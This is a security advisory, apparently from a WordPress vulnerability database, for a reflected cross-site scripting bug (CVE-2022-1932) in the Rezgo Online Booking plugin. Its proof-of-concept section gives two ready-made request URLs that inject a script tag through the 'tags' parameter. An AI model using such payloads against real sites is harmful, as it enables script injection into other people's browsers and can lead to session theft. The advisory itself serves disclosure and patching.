Rezgo Online Booking < 4.1.8 – Reflected Cross-Site-Scripting | CVE 2022-1932 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting, which can be exploited either via a LFI in an AJAX action, or direct call to the affected file

Proof of Concept

Direct call: https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

Via the LFI:

Once the plugin is configured (can use a dummy "Rezgo Company Code" and "Rezgo API Key" in the "Acccount Information" settings section):

http://example.com/wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=%22%3E%3Cscript%3Ealert(`xss`)%3C/script%3E

Affects Plugins

Fixed in 4.1.8

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

005c2300-f6bd-416e-97a6-d42284bbb093

Timeline

Publicly Published

2022-07-26 (about 3 years ago)

Added

2022-07-26 (about 3 years ago)

Last Updated

2022-08-25 (about 3 years ago)

Other

Published

Title

Published

2024-05-22

Title

ProfilePress < 4.15.9 - Contributor+ Stored XSS

Published

2025-04-01

Title

Lightweight and Responsive Youtube Embed <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

Page Layout Builder 1.3.4 - includes/layout-settings.php layout_settings_id Parameter Reflected XSS

Published

2025-08-11

Title

Software Issue Manager < 5.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via noaccess_msg Parameter

Published

2021-09-08

Title

Custom Menu Plugin <= 1.3.3 - Reflected Cross-Site Scripting